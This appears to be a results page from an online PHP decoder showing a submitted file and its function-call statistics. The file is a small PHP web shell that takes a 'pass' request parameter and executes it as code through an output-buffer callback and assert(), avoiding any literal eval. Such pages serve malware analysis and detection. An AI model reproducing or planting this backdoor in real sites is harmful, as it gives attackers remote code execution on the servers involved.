Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php $evalstr=""; function myeval($c,$d) { global $evalstr; $evalstr=$c; } ob_start('myev..
Decoded Output download
None
Did this file decode correctly?
Original Code
<?php
$evalstr="";
function myeval($c,$d)
{
global $evalstr;
$evalstr=$c;
}
ob_start('myeval');
echo $_REQUEST['pass'];
ob_end_flush();
assert($evalstr);
?>
Function Calls
assert | 1 |
ob_start | 1 |
ob_end_flush | 1 |
Stats
MD5 | d24efe9fa31fe74d096d17c7159c4f29 |
Eval Count | 0 |
Decode Time | 117 ms |